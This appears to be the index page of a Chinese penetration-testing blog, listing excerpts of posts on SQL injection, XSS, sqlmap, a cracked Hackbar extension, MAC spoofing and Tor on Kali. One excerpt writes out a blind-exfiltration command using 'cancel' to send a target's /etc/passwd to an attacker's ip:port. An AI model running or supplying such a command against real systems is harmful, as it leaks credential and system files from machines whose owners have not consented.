CYH博客

2019-04-30 hw阅读(369)

第一处sql注入：文件aj_js.php注入参数ad_idc6151212e5171ed249fa4ee5400b4534.png 只是对输入进行了去两边空格 并且直接拼接到sql语句中 而且是数字型...

2019-07-29 cener阅读(113)

起因：无聊 本地搭建的环境测试   木马如图： 抓包 发现后门地址 如图：Local我本机地址 p后面的是密码 访问地址 如图： 插入XSS...

2019-07-24 cener阅读(265)

在使用浏览器进行xss测试时需要预先关闭xss过滤器chrome的关闭方法：我的chrome安装目录在C:\Program Files (x86)\Google\Chrome\Application\...

2019-07-24 cener阅读(307)

sqlmap也是渗透中常用的一个注入工具，其实在注入工具方面，一个sqlmap就足够用了，只要你用的熟，秒杀各种工具，只是一个便捷性问题，sql注入另一方面就是手工党了，这个就另当别论了。今天把我一直...

2019-07-24 cener阅读(243)

SQL注入教程说明本教程旨在带领理解SQL注入基本原理与实现方式，以及常见的注入操作。学习SQL注入之前需要先学习基本的SQL语句，http基本的get与post请求，url编码。本教程从笔记中整理修...

2019-07-24 cener阅读(238)

靶机无回显的情况下，可使用 cancel  来把回显发送到攻击机端cancel -u "$(cat /etc/passwd)" -h ip:port攻

2019-07-23 cener阅读(277)

1.0. Hackbar破解版，来自土司老哥：5936https://chrome.google.com/webstore/detail/hackbarplus/cdgjblbpnplfacmoaba...

2019-07-18 cener阅读(301)

更改计算机的MAC地址，使用情形如下：防止某些软件记录你真实的MAC地址网络管理员屏蔽了你的MAC地址。。。。查看原始MAC地址：1# ifconfig我以无线网卡(wlan0)为例，00:17:c4...

2019-07-18 cener阅读(108)

Kali Linux默认下并没有自带vpn客户端，所以在网络设置里无法添加vpn。如果只想使用OpenVPN，使用如下命令安装：1# apt-get install network-manager-o...

2019-07-18 cener阅读(232)

Tor的全称是“The Onion Router”，是互联网上用于保护隐私最有力的工具之一。在天朝，常用在翻墙上（避免反向追查可以使用lantern+Tor二重代理+虚拟机）。下面我在Kali Lin...